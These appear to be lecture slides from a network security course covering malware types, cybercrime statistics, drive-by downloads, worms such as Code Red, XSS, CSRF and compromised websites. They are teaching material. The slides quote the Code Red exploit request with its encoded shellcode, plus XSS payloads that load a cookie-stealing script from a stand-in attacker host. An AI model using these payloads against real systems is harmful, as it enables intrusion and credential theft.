150 likes | 164 Views
Explore the world of malware, worms, and web issues affecting network security. Learn about different types of threats, statistics on cybercrime, and methods used to attack user machines and websites. Stay informed to protect your network. Instructor: Bo Sheng.
E N D
Malwares, Worms, and Web Issues IT443 – Network Security Administration Instructor: Bo Sheng
Malware • Computer systems still have many vulnerabilities • When exposed to the Internet leads to exploitation • Major issue as computer systems become more ubiquitous • Malware is a generic term that refers to malicious software • Terminology • Virus: computer program designed to spread (require human intervention) • Worm: does not require human intervention • Trojan horse: allows remote access to unauthorized users • Adware: ads when application is running • Spyware: monitors & collets information to be transmitted to a third party without user knowledge/consent
Threats to Networks • Motivation evolved from pursuit of fame to financial and political • Examples • BGP hijacking (e.g., 2008 youtube hijacking) • Viruses, worms and bots are more stealthy today • 2008-2009 conficker infected 2-15 million windows servers • Malware is more prevalent than ever, leading to an underground economy (XSS attacks) • “MPack is sold as commercial software (costing $500 to $1,000 US), and is provided by its developers with technical support and regular updates of the software vulnerabilities it exploits.”
Some Interesting Numbers • From • “The Business of Roguware”, PandaLabs, 2010 • “The Business of Cybercrime”, PandaLabs, 2008 • “Web Based Attacks”, Symantec, 2009 • Adware industry is worth 2 billion dollars per year • Malware industry is worth 105 billion dollars per year • > 80% of the e-mail traffic out there is spam • 50%-80% of computers connected to Internet infected with spyware • Some people make 20 thousand dollars (!) per month using botnets (i.e., compromised computers) • A 26 year-old made 20 million dollars with spam before being caught • 2 billion dollars was lost to phishers four years ago
Online Crime is a Business Now • Klikparty, 2007
Web Attacks - Trends [Symantec White Paper 08- 2/09] • Drive by download from mainstream websites • Dynamic and highly obfuscated malware • Browser plugins • Misleading applications • SQL injection on mainstream websites • Malvertisements: users redirected to malicious websites • Exponential increase in unique and targeted malware samples
Web Attacks – Sequence of Events • Breaking into legitimate websites to post malware • Attacking end user machines • Leveraging end user machines for malicious activities
Attacking Users Machines • Drive by download sequence of events • Compromise legitimate website • User visits, if a multimedia plugin is out of date => can be compromised • Redirect to malicious website which obtains information such as web browser, OS, plugins • Serve malicious multimedia data to compromise machine • Steal personal information • Software vulnerabilities [report indicates 600M browsers insecure] • Web attack toolkits (off the shelf) • Neosploit, Mpack, IcePack, El Fiesta, Adpack • Efficient: profiling the victim, timing (below the radar), geographic variances, old to new exploits, brute force, playing the odds, obfuscation, polymorphic malware/urls • Obfuscation using encryption difficult to detect
History of Worms • Worms self-replicate by exploiting vulnerabilities in remote machines • Apps running on some port • Vulnerabilities are purchased for malicious and legitimate use • Worms carry a payload to take actions • One of the first worms to extensively spread by Robert Morris, 1988 • Uses fingerd and sendmail buffer overflow, rsh, weak passwords • Around 10% Internet hosts infected • Convicted, 3 years of probation, 400 hours of community service work • Many worms since then with a peak during 2000-2004 period • Today worms are more stealthy
Code Red • “How to Own the Internet on your Spare Time”, S. Staniford, V. Paxson, N. Weaver, USENIX Security 2002. • Date July 13th, 2001 / July 19th, 2001 • Exploit • Microsoft IIS webservers using .ida vulnerability [published June 18, 2001] • Payload • Website defacement • DDoS a list of web sites including www.whitehouse.gov • Spreading • 99 threads: each generates random IP address and infects • 100th thread: defaces website
Code Red CRv1 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Cross-site Scripting (XSS) • Vulnerability commonly found in web applications • attackers inject malicious code (e.g. JavaScript programs) into victim’s web browser • steal the victim’s credentials, such as cookies • bypass the access control policies
Cross-site Scripting (XSS) • Bob has a legitimate web site, and Alice is a registered user • Bob’s web site allows queries like http://bobssite.org?q=search_term • The attacker finds the XSS vulnerability http://bobssite.org?q=<script%20type='text/javascript'>alert('xss');</script> • Non-persistent • The attack emails Alice with a link http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js" • Persistent • The attacker posts a comment. I love the puppies in this story! They're so cute!<script src="http://mallorysevilsite.com/authstealer.js">
Cross-Site Request Forgery • The victim user logs into the trusted site using his username and password, and thus creates a new session. • The trusted site stores the session identifier for the session in a cookie in the victim user’s web browser. • The victim user visits a malicious site. • The malicious site’s web page sends a request to the trusted site from the victim user’s browser. • The web browser automatically attaches the session cookie to the malicious request because it is targeted for the trusted site. • The trusted site processes the malicious request forged by the attacker web site.
Legitimate Websites • Shift from pornographic/pirateware websites to legitimate websites • Why? more users, less suspicion • In 2008, symantec observed Web attacks from 808,000 unique domains, many of which are mainstream websites • Complex websites with content from many sources (ads), dynamically generated, running on user machines, requiring plugins • How? • SQL injection (inject malicious html code in backend database and serve it to user). Trojan.Asprox automates the process: 1) search the web for vulnerable websites, 2) inject invisible iframe pointing to malicious pages • Malicious Advertisements: hard to validate given the amount of ads, hard to detect ads appear with low frequency, usually ad is OK but redirects to a malicious website • Search engine redirection, attacks on backend of virtual hosting, vulnerabilities in webserver or forum server, cross-site scripting attacks